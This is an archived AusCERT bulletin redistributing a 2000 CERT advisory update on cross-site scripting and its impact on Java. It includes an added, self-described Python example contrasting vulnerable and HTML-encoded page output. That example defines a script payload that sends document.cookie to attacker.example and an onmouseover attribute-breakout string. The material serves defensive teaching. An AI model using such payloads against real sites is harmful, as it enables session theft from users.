ESB-2000.025 -- Update to CERT Advisory CA-2000-02 -- Malicious HTML Tags Embedded in Client Web Requests

Date: 06 February 2000
References: ESB-2000.230  ESB-2000.327  ESB-2000.330  ESB-2003.0279  

-----BEGIN PGP SIGNED MESSAGE-----

===========================================================================
              AUSCERT External Security Bulletin Redistribution
                             
             ESB-2000.025 -- Update to CERT Advisory CA-2000-02
             Malicious HTML Tags Embedded in Client Web Requests
                              07 February 2000

===========================================================================

The CERT Coordination Center has released the following update to its
advisory concerning a vulnerability in web servers that dynamically
generate pages from unvalidated input supplied by untrustworthy sources.

A web site may inadvertently include malicious HTML tags or script in its
pages if those pages are generated dynamically and untrusted input (for
example, form fields or parameters taken from the client's request) is
copied into them without proper validation or encoding.

This vulnerability may allow web browser users to unintentionally execute
attacker-written scripts in their browsers when they follow untrusted links
in web pages, mail messages or newsgroup postings: the script travels in the
request and is reflected back to the browser by the vulnerable site. Browser
users may also unknowingly execute malicious scripts when viewing dynamically
generated pages built from content provided by other users.
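The flaw summarised above is the one that later came to be called cross-site scripting: a server copies data from a client request into a page that a browser will render as markup. The following Python is an added example and is not part of this bulletin or of the CERT advisory; the page generator, the two constructed attacker inputs and the checking helper are all hypothetical, chosen to show the vulnerable behaviour beside the encoding fix.

```python
import html

# Constructed attacker inputs (not from the advisory): one aimed at a text
# context, one at a double-quoted attribute context.
INJECTED_QUERY = '<script>document.location="http://attacker.example/?c="+document.cookie</script>'
INJECTED_ATTR = '" onmouseover="alert(document.cookie)'


def render_search_page_vulnerable(query: str) -> str:
    """Echo the search term into the page without any encoding.

    This is the flaw the advisory describes: whatever the client sent in the
    request is copied straight into HTML that a browser will parse as markup.
    """
    return (
        "<html><body>"
        f"<p>Results for: {query}</p>"
        f'<input name="q" value="{query}">'
        "</body></html>"
    )


def render_search_page_hardened(query: str) -> str:
    """Same page, with untrusted data HTML-encoded before it is inserted.

    html.escape(..., quote=True) turns & < > " and ' into character
    references, so the browser shows the value as text (or keeps it inside
    the attribute value) instead of interpreting it as a tag or a new
    attribute.
    """
    safe = html.escape(query, quote=True)
    return (
        "<html><body>"
        f"<p>Results for: {safe}</p>"
        f'<input name="q" value="{safe}">'
        "</body></html>"
    )


def contains_executable_markup(page: str) -> bool:
    """Hypothetical check used only to compare the two renderings: does the
    page contain a raw <script> tag or the injected event-handler attribute?
    After encoding, '<script' becomes '&lt;script' and the attribute breakout
    becomes '&quot; onmouseover=&quot;', so neither pattern survives."""
    lowered = page.lower()
    return "<script" in lowered or ' onmouseover="' in lowered


if __name__ == "__main__":
    for payload in (INJECTED_QUERY, INJECTED_ATTR):
        print("vulnerable:", contains_executable_markup(render_search_page_vulnerable(payload)))
        print("hardened:  ", contains_executable_markup(render_search_page_hardened(payload)))
```

The encoding shown is correct only for HTML text and quoted attribute values; data placed inside a URL, a script block or a style block needs encoding appropriate to that context, and input validation on the server does not remove the need to encode on output.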

This update clarifies the impact this vulnerability may have on Java.

The original CERT Advisory CA-2000-02 was released by AusCERT as 
External Security Bulletin ESB-2000.023.


- --------------------------BEGIN INCLUDED TEXT--------------------

- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

The CERT Coordination Center has released updates to CERT Advisory
CA-2000-02 and the FAQ About Malicious Web Scripts Redirected by Web
Sites which clarifies the impact this vulnerability has on Java. These
documents are available at

	http://www.cert.org/advisories/CA-2000-02.html
	http://www.cert.org/tech_tips/malicious_code_FAQ.html
	
Of special note is the newly-added question about disabling Java,
available at 

	http://www.cert.org/tech_tips/malicious_code_FAQ.html#java

We encourage you to read this new information carefully. 

For additional information about Java, you may also wish to visit

	http://java.sun.com/sfaq

Our thanks to James Gosling and Gary Ellison of Java Software, Sun
Microsystems for their help in producing these updates.


- -----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQA/AwUBOJtEM1r9kb5qlZHQEQJfegCeM1YoHHhstmN8I4gMBecd+FsQHd4AoNS+
TeaYF2XzxPb0ijR9PCOFjDER
=u5zM
- -----END PGP SIGNATURE-----

- ---------------------------END INCLUDED TEXT---------------------

This security bulletin is provided as a service to AusCERT's members.  As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content.  The decision to use any or all of this information is
the responsibility of each user or organisation, and should be made in
accordance with site policies and procedures.

NOTE: This is only the original release of the security bulletin.  It may
not be updated when updates to the original are made.  If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the original authors to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above.  If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

	http://www.auscert.org.au/Information/advisories.html

If you believe that your system has been compromised, contact AusCERT or
your representative in FIRST (Forum of Incident Response and Security
Teams).

Internet Email: auscert@auscert.org.au
Facsimile:	(07) 3365 7031
Telephone:	(07) 3365 4417 (International: +61 7 3365 4417)
		AusCERT personnel answer during Queensland business hours
		which are GMT+10:00 (AEST).
		On call after hours for emergencies.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv
Comment: ftp://ftp.auscert.org.au/pub/auscert/AUSCERT_PGP.key

iQCVAwUBOJ/axSh9+71yA2DNAQFArQP9HIiejXTs6cj6xftdvGSPZBpJlkI5z1nZ
zajHnSg81nFUvNgGyw5WS+X7Yx0YzfY1YS3hbW0bHmIhf8OT3Z3r9RV7LZQBk+pO
cM+5CV0svvWJTpQ2doZnjy8/cksNGxWkVRO1l7gQw6dJ3xXUKoYJjwY9C8SJVfrD
bgfg+kcbQ2s=
=DH2k
-----END PGP SIGNATURE-----